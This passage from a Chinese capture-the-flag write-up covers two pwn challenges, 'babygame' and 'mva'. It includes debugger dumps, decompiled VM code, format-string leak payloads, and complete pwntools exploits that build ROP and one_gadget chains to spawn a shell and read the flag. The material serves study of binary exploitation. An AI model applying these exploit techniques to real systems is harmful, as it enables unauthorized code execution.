11:00880x7ffee08a76f8 —▸ 0x557a74bd3180 ◂— endbr64
12:00900x7ffee08a7700 —▸ 0x7ffee08a79a0 ◂— 0x1

第一次定位没有发现合适的目标,极有可能被“-%p”覆盖了,所以第二次采用精确定位,随便看看覆盖那部分有没有目标:(输入“-%11$p”)

1
2
Good luck to you.
-0x7ffd31ce53d0*** stack smashing detected ***: terminated
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7ffd31ce52d0 ◂— 0x70243131252d /* '-%11$p' */
01:00080x7ffd31ce52d8 ◂— 0x0
02:00100x7ffd31ce52e0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
03:00180x7ffd31ce52e8 —▸ 0x7efd3be66d6f (printf+175) ◂— mov rcx, qword ptr [rsp + 0x18] /* target No.9 */
04:00200x7ffd31ce52f0 ◂— 0x3000000010
05:00280x7ffd31ce52f8 —▸ 0x7ffd31ce53d0 ◂— 0x64f17ed180 /* No.11 */
06:00300x7ffd31ce5300 —▸ 0x7ffd31ce5310 ◂— 0x3000000010
07:00380x7ffd31ce5308 ◂— 0xb87bdb51f4286a00 /* canary No.13 */
08:00400x7ffd31ce5310 ◂— 0x3000000010
09:00480x7ffd31ce5318 ◂— 0x64
0a:00500x7ffd31ce5320 ◂— 0x0
0b:00580x7ffd31ce5328 ◂— 0x0
0c:00600x7ffd31ce5330 ◂— 0x99059999
0d:00680x7ffd31ce5338 ◂— 0xffffffffffffffff
0e:00700x7ffd31ce5340 ◂— 0xd68
0f:00780x7ffd31ce5348 —▸ 0x7ffd31ce54f4 ◂— 0x6161616100000001
10:00800x7ffd31ce5350 —▸ 0x7ffd31ce53c0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
11:00880x7ffd31ce5358 —▸ 0x5590f17ed180 ◂— endbr64
12:00900x7ffd31ce5360 —▸ 0x7ffd31ce5600 ◂— 0x1
13:00980x7ffd31ce5368 ◂— 0x0
14:00a0│ 0x7ffd31ce5370 ◂— 0x0
15:00a8│ 0x7ffd31ce5378 —▸ 0x7efd3be495f4 (atoi+20) ◂— add rsp, 8 /* to leak libc_base No.27 */
16:00b0│ 0x7ffd31ce5380 ◂— 0x8

可以发现:可以在“No.13”处泄露canary,可以在“No.27”处泄露libc_base

写入的内容必须使程序可以循环(这里我想不明白),在和大佬交流过后,我找到了解决的办法:

1
2
3
4
00:0000│ rdi rsi rsp 0x7ffd31ce52d0 ◂— 0x70243131252d /* '-%11$p' */
01:00080x7ffd31ce52d8 ◂— 0x0
02:00100x7ffd31ce52e0 —▸ 0x7ffd31ce53e0 —▸ 0x7ffd31ce5510 ◂— 0x0
03:00180x7ffd31ce52e8 —▸ 0x7efd3be66d6f (printf+175) ◂— mov rcx,

可以在“read”控制的范围中写入栈上的某个地址,直接修改其内容(这个地址最好是函数pwn的返回地址)

1
2
3
4
5
22:0110│ rbp         0x7ffd1b017280 —▸ 0x7ffd1b0173b0 ◂— 0x0
23:01180x7ffd1b017288 —▸ 0x560a9a5ba543 ◂— mov eax, 0
/* pwn的返回地址 */
24:01200x7ffd1b017290 ◂— 0x6161616161616161 ('aaaaaaaa')
/* 其实这里就是stack_addr(第一次read写入的地址) */

可以直接计算返回地址的栈地址,在“No.9”的位置写入它(注意内存对齐)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
target_stack=stack_addr-0x8
payload = "%13$p%27$p"
payload +="%"+str(0x54c2-0x20)+"c"+"%9$hn"
payload = payload.ljust(0x18,"a")
payload = flat([payload,p64(target_stack)])

p.sendline(payload)
p.recvuntil('0x')
canary=int((p.recv(16)),16)
p.recvuntil('0x')
leak_addr=int((p.recv(12)),16)
libc_base=leak_addr-280052

success('canary >> '+hex(canary))
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))
1
2
3
4
5
6
pwndbg> stack 50
00:0000│ rdi rsi rsp 0x7fff152d9870 ◂— 0x3732257024333125 ('%13$p%27')
01:00080x7fff152d9878 ◂— 0x3636363132257024 ('$p%21666')
02:00100x7fff152d9880 ◂— 0x61616e6824392563 ('c%9$hnaa')
03:00180x7fff152d9888 —▸ 0x7fff152d9988 —▸ 0x55ddcf5f9543 ◂— mov eax, 0 /* 此处已经被写入了pwn的返回地址,偏移为"9" */
04:00200x7fff152d9890 ◂— 0x300000000a /* '\n' */
1
2
3
4
5
6
7
8
.text:00000000000014BD 128                 call    _puts
.text:00000000000014C2 128 lea rax, [rbp+name] // 0x54c2
.text:00000000000014C9 128 mov edx, 256h ; nbytes
.text:00000000000014CE 128 mov rsi, rax ; buf
.text:00000000000014D1 128 mov edi, 0 ; fd
/* 我们已经泄露了canary,劫持程序回到栈溢出的点就可以获取shell */
/* 这个"5"其实是随便写的,因为地址随机化是按页划分的,覆盖低3位,就有1/16的概率匹配 */
/* 至于为什么选择这个地址,其实也没有什么要求,在这附近就行(在read之前) */

最后的栈溢出获取 shell 就很简单了,挂一下完整exp:(注意爆破脚本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
from pwn import *
from ctypes import *

elf=ELF('./babygame')
libc=ELF('./libc-2.31.so')
key=cdll.LoadLibrary('./libc-2.31.so')

def pwn():
#gdb.attach(p)
p.recvuntil('Please input your name:')
payload='a'*256+'1'*4+'a'*12
p.send(payload)
p.recvuntil('1'*4+'a'*12)
leak_addr=u64(p.recvuntil('\n')[:-1].ljust(8,'\x00'))
stack_addr=leak_addr-528
success('leak_addr >> '+hex(leak_addr))
success('stack_addr >> '+hex(stack_addr))
seed=key.srand(0x31313131)

for i in range(100):
p.recvuntil('round '+ str(i+1)+ ': \n')
num=(key.rand()+1)%3
p.sendline(str(num))

p.recvuntil("Good luck to you.\n")

target_stack=stack_addr-0x8
payload = "%13$p%27$p"
payload +="%"+str(0x54c2-0x20)+"c"+"%9$hn"
payload = payload.ljust(0x18,"a")
payload = flat([payload,p64(target_stack)])

p.sendline(payload)

p.recvuntil('0x')
canary=int((p.recv(16)),16)
p.recvuntil('0x')
leak_addr=int((p.recv(12)),16)
libc_base=leak_addr-280052

success('canary >> '+hex(canary))
success('leak_addr >> '+hex(leak_addr))
success('libc_base >> '+hex(libc_base))

poprdi_ret=0x23b72+libc_base
ret=0x22679+libc_base
system_libc=libc.sym['system']+libc_base
binsh = next(libc.search(b"/bin/sh"))+libc_base

payload='a'*(0x120-0x18)+p64(canary)+'a'*0x10+'b'*0x8
payload+=p64(poprdi_ret)+p64(binsh)+p64(ret)+p64(system_libc)
p.sendline(payload)
sleep(1)
p.recvuntil("2. paper\n")
log.success("success")
p.sendline("1")
p.interactive()

if __name__ =="__main__":
while True:
sleep(0.5)
p=process('./babygame')
try:
pwn()
except EOFError:
p.close()
log.success("continue!!!")

小结

这次比赛我摆烂了,没有出多少力,看着 kernel pwn 和那些我不知道是什么的东西,我感觉我排不上用场了,于是花了一下午去搭了搭 kernel 的环境,后来就出了这道题(我稍微可以摸一摸)

先谈谈我遇到这道题时的“阻力”吧:

  • 不知道栈溢出该泄露什么东西
    • 后面有格式化漏洞,我的第一反应就是泄露“stack_addr”,但是这个canary保护着后面的数据,导致我当时想着先泄露canary,然后再格式化漏洞里面泄露其他东西
  • 如何绕过随机数检测
    • 这个在当时只卡了一小会(当时那个愚蠢的我还想着全输入“1”来爆破),后来选择覆盖seed,一下子就搞定了
  • 如何绕过canary
    • 当时我就是卡在了这里,在分析大佬的wp时,我发现大佬把canary给覆盖了,然后去泄露后面的“stack_addr”
    • 我在GDB中发现:当canary被覆盖以后,程序会把原来的返回地址给替换为“异常处理程序”,也就是说,canary报错程序只会在当前函数返回时启动
  • 如何使程序循环
    • 利用格式化漏洞可以轻易获取canary,但是程序本身没有循环,必须控制某个返回地址来使程序再次执行栈溢出漏洞,在复现时这里也困扰了我一下
    • 后来和大佬交流,发现关键点就是在栈中写入“某个返回地址所在的栈地址”,然后计算偏移进行修改(其实我以前总结过,不过后来忘了)

通过本题我把以前丢掉的东西捡了起来,也学了一些新东西

mva

这是我第一次尝试 VMP pwn

1
2
3
4
➜  桌面 ./mva
[+] Welcome to MVA, input your code now :
aaaaaaaa
bbbbbbbb
1
2
3
4
5
6
7
8
mva: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b8c5659d20f095ec5c46c6bccb7c6a05d5952b02, for GNU/Linux 3.2.0, stripped

[*] '/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/mva'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled

64位,dynamically,全开

简单修改后的程序:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
unsigned int v3; // eax
unsigned __int16 v5; // [rsp+20h] [rbp-240h]

init_s();
puts("[+] Welcome to MVA, input your code now :");
fread(&code, 0x100uLL, 1uLL, stdin);
puts("[+] MVA is starting ...");
while ( 1 )
{
((void (__fastcall *)())((char *)&sub_11E8 + 1))(); /* 未知算法 */
v5 = HIBYTE(v3); /* 分析出错 */
if ( v5 > 0xFu )
break;
if ( v5 <= 0xFu )
__asm { jmp rax }
}
puts("[+] MVA is shutting down ...");
return 0LL;
}

因为IDA无法识别跳转表,必须手动修改:

  • 先在IDA的“.rodata”区中找到跳转表(地址“0x206C”)
1
2
3
4
5
6
.rodata:000000000000206C unk_206C        db  8Bh                 ; DATA XREF: main+134↑o
.rodata:000000000000206C ; main+140↑o
.rodata:000000000000206D db 0F3h
.rodata:000000000000206E db 0FFh
.rodata:000000000000206F db 0FFh
.rodata:0000000000002070 db 99h
  • 用 TAB 定位“ __asm { jmp rax } ”的汇编代码位置
1
2
3
4
5
6
7
8
.text:00000000000013D6                 lea     rdx, ds:0[rax*4] // target
.text:00000000000013DE lea rax, unk_206C
.text:00000000000013E5 mov eax, [rdx+rax]
.text:00000000000013E8 cdqe
.text:00000000000013EA lea rdx, unk_206C
.text:00000000000013F1 add rax, rdx
.text:00000000000013F4 db 3Eh
.text:00000000000013F4 jmp rax
  • 在第一个“unk_206C”前进行修改(下面第二个记得勾)

修改完成,并且进行了一些优化后:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int16 v4; // [rsp+1Ah] [rbp-246h]
__int16 v5; // [rsp+1Ch] [rbp-244h]
unsigned __int16 key; // [rsp+20h] [rbp-240h]
unsigned int enc_num; // [rsp+24h] [rbp-23Ch]
int v8; // [rsp+28h] [rbp-238h]
__int64 v9; // [rsp+30h] [rbp-230h]
__int64 v10; // [rsp+44h] [rbp-21Ch]
int v11; // [rsp+4Ch] [rbp-214h]
__int16 v12[260]; // [rsp+50h] [rbp-210h]
unsigned __int64 v13; // [rsp+258h] [rbp-8h]

v13 = __readfsqword(0x28u);
init_s();
v4 = 0;
v9 = 0LL;
v10 = 0LL;
v11 = 0;
v5 = 1;
puts("[+] Welcome to MVA, input your code now :");
fread(&code, 0x100uLL, 1uLL, stdin); /* 输入code */
puts("[+] MVA is starting ...");
LABEL_102:
while ( v5 )
{
enc_num = enc();
key = HIBYTE(enc_num); /* HIWORD 取8bits高4bits */
if ( key > 0xFu )
break;
if ( key <= 0xFu )
{
switch ( key )
{
case 0u:
v5 = 0;
goto LABEL_102;
case 1u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
goto LABEL_8;
*((_WORD *)&v10 + SBYTE2(enc_num)) = enc_num;
break;
case 2u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) + *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 3u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) - *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 4u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) & *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 5u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) | *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 6u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = (int)*((unsigned __int16 *)&v10 + SBYTE2(enc_num)) >> *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
case 7u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) ^ *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 8u:
JUMPOUT(0x1780LL);
case 9u:
if ( v9 > 256 )
exit(0);
if ( BYTE2(enc_num) )
v12[v9] = enc_num;
else
v12[v9] = v10;
++v9;
goto LABEL_102;
case 0xAu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( !v9 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = v12[--v9];
goto LABEL_102;
case 0xBu:
v8 = enc();
if ( v4 == 1 )
index = v8;
goto LABEL_102;
case 0xCu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
v4 = *((_WORD *)&v10 + SBYTE2(enc_num)) == *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
case 0xDu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) * *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
case 0xEu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 )
exit(0);
*((_WORD *)&v10 + SBYTE1(enc_num)) = *((_WORD *)&v10 + SBYTE2(enc_num));
goto LABEL_102;
case 0xFu:
printf("%d\n", (unsigned __int16)v12[v9]);
goto LABEL_102;
default:
LABEL_8:
exit(0);
}
}
}
puts("[+] MVA is shutting down ...");
return 0LL;
}

好看一点了

入侵思路

说实话有点搞,但是还是只能一步步分析每个“case”的作用,以及可能的漏洞:

  • case0:终止循环
  • case1:赋值v10为“enc_num”
1
2
3
4
5
6
7
8
9
#define SBYTE2(x)   SBYTEn(x,  2) /* 右移16位然后取低8位 */
#define SBYTEn(x, n) (*((int8*)&(x)+n)) /* 取(地址+2)的内容-第3字节 */

case 1u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
goto LABEL_8; /* exit */
*((_WORD *)&v10 + SBYTE2(enc_num)) = enc_num; /* 感觉v10有点溢出 */
break;
/* 在(v10+SBYTE2(enc_num))的位置写入enc_num */
  • case2:对v10进行加操作(后面的代码都是类似的)
1
2
3
4
5
6
7
8
9
case 2u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) + *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case3:对v10进行减操作
  • case4:对v10进行与操作
  • case5:对v10进行或操作
  • case6:对v10进行位移操作
1
2
3
4
5
6
7
case 6u:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = (int)*((unsigned __int16 *)&v10 + SBYTE2(enc_num)) >> *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
  • case7:对v10进行异或操作
1
2
3
4
5
6
7
8
9
case 7u:                              
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) ^ *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case8:乱码,只能看汇编
1
2
3
4
5
6
7
.text:0000000000001780 loc_1780:                               ; DATA XREF: .rodata:jpt_13D6↓o
.text:0000000000001780 mov eax, 0
.text:0000000000001785 call enc
.text:000000000000178A mov [rbp+var_234], eax
.text:0000000000001790 mov eax, [rbp+var_234]
.text:0000000000001796 mov cs:index, eax
.text:000000000000179C jmp loc_1A2B
  • case9:把v10赋值给v12
1
2
3
4
5
6
7
8
9
10
11
12
__int64 v9; // [rsp+30h] [rbp-230h] /* 数组负溢出 */
__int16 v12[260]; // [rsp+50h] [rbp-210h]

case 9u:
if ( v9 > 256 )
exit(0);
if ( BYTE2(enc_num) )
v12[v9] = enc_num;
else
v12[v9] = v10;
++v9;
goto LABEL_102;
  • case10:把v12赋值给v10
1
2
3
4
5
6
7
case 0xAu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( !v9 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = v12[--v9];
goto LABEL_102;
  • case11:再次执行“enc”,重置index
1
2
3
4
5
case 0xBu:
v8 = enc();
if ( v4 == 1 )
index = v8;
goto LABEL_102;
  • case12:比较
1
2
3
4
5
6
7
case 0xCu:                             
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 || (enc_num & 0x8000) != 0 )
exit(0);
v4 = *((_WORD *)&v10 + SBYTE2(enc_num)) == *((_WORD *)&v10 + SBYTE1(enc_num));
goto LABEL_102;
  • case13:对v10进行乘操作
1
2
3
4
5
6
7
case 0xDu:                             
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( (char)enc_num > 5 || (enc_num & 0x80u) != 0 )
exit(0);
*((_WORD *)&v10 + SBYTE2(enc_num)) = *((_WORD *)&v10 + SBYTE1(enc_num)) * *((_WORD *)&v10 + (char)enc_num);
goto LABEL_102;
  • case14:赋值v10
1
2
3
4
5
6
7
case 0xEu:
if ( SBYTE2(enc_num) > 5 || (enc_num & 0x800000) != 0 )
exit(0);
if ( SBYTE1(enc_num) > 5 )
exit(0);
*((_WORD *)&v10 + SBYTE1(enc_num)) = *((_WORD *)&v10 + SBYTE2(enc_num));
goto LABEL_102;
  • case15:打印v12
1
2
3
case 0xFu:
printf("%d\n", (unsigned __int16)v12[v9]);
goto LABEL_102;

分析:首先这个“case15”一定是用来 leak libc_base 的(可能是:利用case9把v10赋值给v12,然后利用case15来打印v12)

在此之前还必须思考一下函数“enc”的逻辑以生成合适的“key”,程序原本的代码为:

1
2
3
4
5
6
7
8
9
10
#define HIBYTE(x)   (*((_BYTE*)&(x)+1)) /* 让一个4字节的数据,保留第2个字节 */

__int64 enc()
{
unsigned int key; // [rsp+4h] [rbp-Ch]

key = (*(_DWORD *)((char *)&code + index) << 8) & 0xFF0000 | (*(_DWORD *)((char *)&code + index) >> 8) & 0xFF00 | HIBYTE(*(_DWORD *)((char *)&code + index)) | (*(_DWORD *)((char *)&code + index) << 24);
index += 4; /* 每次操作4字节 */
return key;
}

用 python 进行简化处理:

1
2
3
4
5
code=9 # input(4byte)
enc_num = ((code << 8) & 0xFF0000) | ((code >> 8) & 0xFF00) | ((code >> 8) & 0xFF)| ((code << 24) & 0xff000000)
key=(enc_num >> 24) & 0xff
print("enc_num="+str(enc_num))
print("key="+str(key))

经过多轮测试:4字节“input”的最后1字节就是“key”(解决了“key”的问题,还有很多谜团,程序有意把4字节的code按照地址高低分为4部分,我不知道为什么)

我觉得我到此为止了,目前还有以下几个问题需要解决:

  • 控制v12进行打印(leak libc_base and pro_base)
  • 最终的入侵手段(hook or ret-system)
  • 漏洞利用点(我勉强能分析清楚程序的意思,但利用点就不清楚了)

复现官方wp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/python3

from pwn import *
context.arch='amd64'

def pack(op:int, p1:int = 0, p2:int = 0, p3:int = 0) -> bytes:
return (op&0xff).to_bytes(1,'little') + \
(p1&0xff).to_bytes(1,'little') + \
(p2&0xff).to_bytes(1,'little') + \
(p3&0xff).to_bytes(1,'little')

def ldr(val): # v10=p1(offset1)~p2(offset2)~p3(offset3)
return pack(0x01, 0, val >> 8, val)

def add(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) + *(&v10+p3)
return pack(0x02, p1, p2, p3)

def sub(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) - *(&v10+p3)
return pack(0x03, p1, p2, p3)

def shr(p1, p2): # *(&v10+p1)=*(&v10+p1) >> *(&v10+p2)
return pack(0x06, p1, p2)

def xor(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) ^ *(&v10+p3)
return pack(0x07, p1, p2, p3)

def push(): # v12=v10(ban "v12=*(&v10+p1)")
return pack(0x09)

def pop(p1): # *(&v10+p1)=v12
return pack(0x0a, p1)

def mul(p1, p2, p3): # *(&v10+p1)=*(&v10+p2) * *(&v10+p3)
return pack(0x0D, p1, p2, p3)

def mv(p1, p2): # *(&v10+p2) = *(&v10+p1)
return pack(0x0E, p1, p2)

def sh(): # show
return pack(0x0F)

puts_offset = 0x845ca
puts_leak = (0x38 + 0x268 - 0x224) >> 1
onegadgetlst = [0xe3b2e, 0xe3b31, 0xe3b34]
onegadget = onegadgetlst[0]
toadd = onegadget - puts_offset
stack_leak = (0x268 - 0x224) >> 1
stack_pointer_leak = (0x238 - 0x224) >> 1

tosub = 0x1a799e + 0x308
# tosub = 0x1a399e + 0x308 # debug aslr
tosub = tosub - 0x3000 # no aslr : player environment
tosub = tosub - 0x4000 # aslr : player environment

# - 0x308 + stack_leak - puts + 0x1a799e
pay = ldr(0x1)
pay += mv(0,1)
pay += ldr(tosub&0xffff)
pay += mv(0,3)
pay += mul(4,-puts_leak,1)
pay += mul(5,-stack_leak,1)
pay += sub(0,5,4)
pay += sub(0,0,3)
pay += shr(0,1)
pay += push()

pay += ldr((tosub>>16)&0xffff)
pay += mv(0,3)
pay += mul(4,-puts_leak+1,1)
pay += mul(5,-stack_leak+1,1)
pay += sub(0,5,4)
pay += sub(0,0,3)
pay += shr(0,1)
pay += push()

# onegadget
pay += mul(3,-puts_leak,1)
pay += mul(4,-puts_leak+1,1)
pay += ldr(toadd&0xffff)
pay += add(0,3,0)
pay += push()
pay += ldr(((toadd>>16)&0xffff)+1)
pay += add(0,4,0)
pay += push()
pay += mul(0,-puts_leak+2,1)
pay += push()
pay += pop(3)
pay += pop(4)
pay += pop(5)

pay += pop(1)
pay += pop(2)
pay += ldr(0xffff)
pay += xor(2,0,2)
pay += ldr(1)
pay += add(2,0,2)
pay += mv(2,-stack_pointer_leak)
pay += ldr(0xffff)
pay += xor(1,0,1)
pay += mv(1,-stack_pointer_leak+1)
pay += mv(0,-stack_pointer_leak+2)
pay += mv(0,-stack_pointer_leak+3)
pay += mv(5,0)
pay += push()
pay += mv(4,0)
pay += push()
pay += mv(3,0)
pay += push()
pay += ldr(0)
pay += push()

pay += sh()
print(hex(len(pay)))
assert len(pay) <= 0x100
pay = pay.ljust(0x100,b'\0')

# chance of this exp : about 1230 - 10125 times with 1 flag
# I admit this is an awful exp
while True:
p=remote('127.0.0.1',9999)
p.sendafter('\n',pay)
try:
p.recvuntil('starting ...\n')
p.recvline()
p.recvuntil('down ...\n')
p.sendline('cat flag')
res = p.recvline()
print('[+] flag:', res)
p.interactive()
break
except:
p.close()
pass

逻辑简述:

  • 程序把输入进来的 “0x100字节的code” 分为 “每4字节一小份”
  • 每份又分为4个部分:key ~ p1 ~ p2 ~ p3 ,key用来定位需要执行的“指令”(which-case中的条目),p1 p2 p3 就是对应的偏移(用于获取v10中的数据)
  • 另外程序中还有 v10(被操作的主体),v12(被打印的主体)

漏洞分析:

  • v10被强转为了(_WORD *)类型(2字节),本身为int64(8字节),p1过大很容易时溢出
  • mul指令没有对p2进行检查,可以把很大的数字(比如地址)写入*(&v10+p1)
  • mv指令没有对p2进行检查,可以利用较大的数字,使“SBYTEn”被识别为负数
  • push指令将不断进行“++v9”这个操作,“v12”内部的数据可以溢出

先照抄官方的函数定义,并尝试进行泄露:(这里我打算模仿我们组里某个大佬的操作)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pay = push()*8
pay +=sh()+push()+sh()+push()+sh()
pay = pay.ljust(0x100,b'\0')

p.send(pay)

p.recvuntil('[+] MVA is starting ...\n')
a = int(p.recv(6)[:-1])
log.success("a: " + hex(a))
b = int(p.recv(6)[:-1])
log.success("b: " + hex(b))
c = int(p.recv(6)[:-1])
log.success("c: " + hex(c))
d = (c << 32) | (b << 16) | a
log.success("d: " + hex(d))
libc.address = d - 0x223700
log.success("libc.address: " + hex(libc.address))

通过“push”使“v9”持续增加,最后打印“v12[v9]”中的数据

1
2
3
4
  0x55e14e4377fc    mov    rax, qword ptr [rbp - 0x230] /* rax=v9 */
0x55e14e437803 add rax, 1 /* rax=rax+1 */
0x55e14e437807 mov qword ptr [rbp - 0x230], rax /* v9=rax */
0x55e14e43780e jmp 0x55e14e437a2b /* 返回循环开始 */
1
2
3
4
5
6
pwndbg> telescope 0x7fff54fd5480
00:00000x7fff54fd5480 ◂— 0x1 /* v9=1 */
01:00080x7fff54fd5488 ◂— 0x1
02:00100x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:00180x7fff54fd5498 ◂— 0x0 /* v11 */
04:00200x7fff54fd54a0 ◂— 0x0 /* v12[0-3] */
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0x7fff54fd5480
00:00000x7fff54fd5480 ◂— 0x2 /* v9=2 */
01:00080x7fff54fd5488 ◂— 0x1
02:00100x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
03:00180x7fff54fd5498 ◂— 0x0 /* v11 */
04:00200x7fff54fd54a0 ◂— 0x0 /* v12[0-3] */
05:00280x7fff54fd54a8 ◂— 0x1 /* v12[4-7] */
06:00300x7fff54fd54b0 —▸ 0x7f518679a700 —▸ 0x7f518679a190 —▸ 0x55e14e436000 ◂— 0x10102464c457f /* v12[8-11](target) */
07:00380x7fff54fd54b8 —▸ 0x7f518676a680 ◂— 0x7f518676a680
  • v9 = 8 :
1
2
3
4
5
6
7
pwndbg> telescope 0x7fff54fd5480
00:00000x7fff54fd5480 ◂— 0x8 /* v9=8 */
01:00080x7fff54fd5488 ◂— 0x1
02:00100x7fff54fd5490 ◂— 0xb1bc9cd4 /* v10 */
